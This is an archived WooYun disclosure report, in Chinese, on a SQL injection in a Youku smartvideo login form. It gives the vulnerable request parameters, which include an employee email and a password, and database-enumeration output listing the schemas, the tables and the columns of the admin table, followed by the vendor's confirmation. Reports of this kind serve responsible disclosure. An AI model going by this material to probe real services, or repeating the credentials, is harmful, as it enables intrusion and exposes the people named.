乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-24: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
好久没注入了 - -!
http://smartvideo.youku.com/#/home
email=wangbin%40youku.com&password=123456&vlCode=de9a7&rememberMe=0
验证码要过很久才过期?已经改成:Bma123 见谅,系统强制要求改
current user: '[email protected].%'current database: 'dsp_manager'available databases [6]:[*] dsp_manager[*] information_schema[*] mysql[*] performance_schema[*] test[*] zhiruDatabase: zhiru[34 tables]+-----------------------------------+| ppp_admin_user |`| ppp_brand || ppp_brand_account |`| ppp_brand_account_detail |`| ppp_brand_favorite || ppp_brand_group || ppp_brand_info || ppp_brand_info_attachment || ppp_campaign || ppp_campaign_audit || ppp_campaign_image || ppp_campaign_invitation || ppp_campaign_status_change || ppp_campaign_type || ppp_campaign_video_type || ppp_city_mapping || ppp_creator || ppp_creator_city_uv || ppp_creator_city_uv20150924 || ppp_creator_filter || ppp_creator_gender_age_uv || ppp_creator_gender_age_uv20150924 || ppp_creator_info_mapping || ppp_message || ppp_proposal || ppp_proposal_status_change || ppp_transaction || ppp_type_code || ppp_type_group || ppp_video || ppp_yt_adfav_pref || ppp_yt_channel_pref || ppp_yt_creator_adfav_tag || ppp_yt_creator_channel_tag |+-----------------------------------+Database: zhiruTable: ppp_admin_user[7 columns]+-----------------------+-------------+| Column | Type |+-----------------------+-------------+| ADMIN_LAST_LOGIN_DATE | datetime || ADMIN_LAST_LOGIN_IP | varchar(15) || ADMIN_USER_ID | bigint(20) || ADMIN_USER_NAME | varchar(50) || ADMIN_USER_PWD | varchar(64) || CREATION_DATE | timestamp || LAST_UPDATED_DATE | timestamp |+-----------------------+-------------+
可以跨库
危害等级:高
漏洞Rank:20
确认时间:2015-12-24 19:40
感谢BMa!漏洞修复中!
暂无